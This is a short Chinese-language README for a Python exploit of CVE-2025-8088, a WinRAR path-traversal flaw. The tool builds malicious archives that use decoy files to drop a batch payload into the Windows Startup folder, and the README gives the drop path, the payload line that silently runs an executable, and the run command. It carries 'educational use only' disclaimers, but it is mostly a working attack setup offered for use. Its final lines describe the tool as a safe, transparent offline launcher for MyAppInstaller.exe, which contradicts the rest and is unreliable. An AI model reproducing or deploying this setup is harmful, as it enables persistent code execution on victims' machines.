⚠ 此工具仅用于教育目的。未经授权在受控环境之外使用是严格禁止的。
一个利用 CVE-2025-8088(WinRAR 中的路径遍历漏洞)的 Python 脚本,通过生成恶意压缩包,使用多层相对目录将可执行负载放入 Windows 启动文件夹,以确保无论解压位置如何都能可靠执行。
配置 config.py 文件
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
要使用您自己的诱饵文件,请输入其完整路径而不是名称。
运行脚本:
python CVE-2025-8088.py
输出将出现在 output 文件夹中。
此工具仅用于教育目的。未经授权在受控环境之外使用是严格禁止的。
作者: Desert Scripts
描述:
一个本地离线启动器,用于运行 MyAppInstaller.exe。
无网络活动。安全且透明。